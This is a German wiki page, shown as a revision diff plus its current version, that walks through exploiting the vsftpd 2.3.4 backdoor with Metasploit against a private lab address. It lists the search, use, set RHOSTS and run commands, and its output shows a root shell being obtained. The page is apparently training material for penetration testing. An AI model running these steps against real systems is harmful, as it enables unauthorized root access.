Metasploit vsftp exploit: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „=Gefundene Version= ;[*] Nmap: 21/tcp open ftp vsftpd 2.3.4“)
 
 
(3 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
 
=Gefundene Version=
 
=Gefundene Version=
;[*] Nmap: 21/tcp  open  ftp        vsftpd 2.3.4
+
;<nowiki>[*] Nmap: 21/tcp  open  ftp        vsftpd 2.3.4</nowiki>
 +
=Gibt es eingebaute Schwachstellen zum vsftp Server?=
 +
*msf6 > search vsftp
 +
<pre>
 +
Matching Modules
 +
================
 +
 
 +
  #  Name                                  Disclosure Date  Rank      Check  Description
 +
  -  ----                                  ---------------  ----      -----  -----------
 +
  0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03      excellent  No    VSFTPD v2.3.4 Backdoor Command Execution
 +
 
 +
 
 +
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
 +
</pre>
 +
=Module laden=
 +
*msf6 > use 0
 +
=info=
 +
*msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info
 +
=Wir müssen den RHOST setzen=
 +
*msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.0.10.105
 +
=Und Attacke=
 +
*msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
 +
<pre>
 +
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4)
 +
[*] 10.0.10.105:21 - USER: 331 Please specify the password.
 +
[+] 10.0.10.105:21 - Backdoor service has been spawned, handling...
 +
[+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root)
 +
[*] Found shell.
 +
</pre>
 +
;Wir haben kein Prompt aber eine Shell

Aktuelle Version vom 19. Oktober 2022, 16:08 Uhr

Gefundene Version

[*] Nmap: 21/tcp open ftp vsftpd 2.3.4

Gibt es eingebaute Schwachstellen zum vsftp Server?

  • msf6 > search vsftp
Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

Module laden

  • msf6 > use 0

info

  • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info

Wir müssen den RHOST setzen

  • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.0.10.105

Und Attacke

  • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.10.105:21 - USER: 331 Please specify the password.
[+] 10.0.10.105:21 - Backdoor service has been spawned, handling...
[+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
Wir haben kein Prompt aber eine Shell